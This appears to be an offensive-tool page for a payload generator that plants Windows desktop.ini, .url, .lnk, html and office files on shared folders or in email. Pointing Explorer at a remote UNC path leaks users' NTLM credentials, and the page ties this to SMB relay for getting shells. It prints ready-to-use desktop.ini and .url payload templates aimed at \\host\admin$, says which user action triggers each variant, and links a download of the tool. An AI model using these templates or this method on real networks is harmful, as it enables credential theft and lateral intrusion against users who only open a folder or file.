Hacking is not always about breaking systems with remote execution vulnerabilities. This time we are going to use a different approach.

Imagine that you are connected to a domain network and somehow, you are able to deliver files to the network, for example writing files to a heavily used fileserver, sending documents by email to network users or executing MITM attacks against HTTP Trafic. If you are able to do it, then you only need a way to force network computers to connect to the host of your choice.

Our Network payload generation provides new ways that you can use to attack those networks as it is able to deploy several kind of content that will force the remote computers to connect to the designated target and authenticate themselves on behalf of the logged user. At that point there are lots of ways to exploit those systems like sniffing, executing namedpipes or the new smbrelay3.



Our payload generation tool is able to generate and deploy several files like desktop.ini, lnk files, url files, html/office documents with embedded links to a remote resource. Those embedded links are automatically handled by Microsoft explorer and there is no way to disable it.




The -t parameter specifies what kind of payload is going to be used. Examples:

* d1: Iconfile - desktop.ini: The IconFile parameter points to a network resource. When you access a filesystem folder and that desktop.ini is stored on a subfolder, explorer.exe will automatically connect to the network and send user credentials.
* d2: LocalizedResourceName - desktop.ini: The LocalizedResourceName points to a network resource. Works with folder/subfolder
* d3: InfoTip - desktop.ini: The nInfoTip points to a network resource. Works when selecting the folder
* d4: desktop.ini - desktop.ini: The desktop.ini points to a network resource. Works when entering the folder
* d0: All - desktop.ini: Deploy all desktop.ini known payloads at once to ensure that the remote target is engaged.

[.ShellClassInfo]
InfoTip=Proof of concept for desktop redirect - http://www.tarasco.org
desktop.ini=@\\host\admin$,-1
InfoTip=@\\host\admin$,-1
LocalizedResourceName=@\\host\admin$,-1
IconFile=\\host\admin$
IconIndex=-666
ConfirmFileOp=0

* u: url file: Deploy a .url file, that works as an lnk file. The target IconFile= points to a network service.

[DEFAULT]
BASEURL=http://www.tarasco.org
[InternetShortcut]
URL=http://www.tarasco.org
Modified=203BF2701D7FC60120
IconIndex=3
IconFile=\\host\admin$

* l: url file: Deploy a .lnk file. This is a void builtin lnk file that contains a CUSTOMICON parameter (flag & 128) pointing to a network service.

* h: html file: Deploy a .html file with an LINK REL="stylesheet" pointing to a network service .

* o: office file: Deploy a .pps file with a LINK REL="stylesheet" html code pointing to a network service. You can rename the file extension to .doc,.ppt,.pps,.xls,..

The -p parameter is optional and points to the directory where the payload is going to be saved.
You can use this tool to deploy payloads and attack a network pipe created by the namedpipes tool or replay SMB or HTTP traffic to a designated target to get a shell with smbrelay3.
You can browse online the source code.



Download (Windows executable + Source code)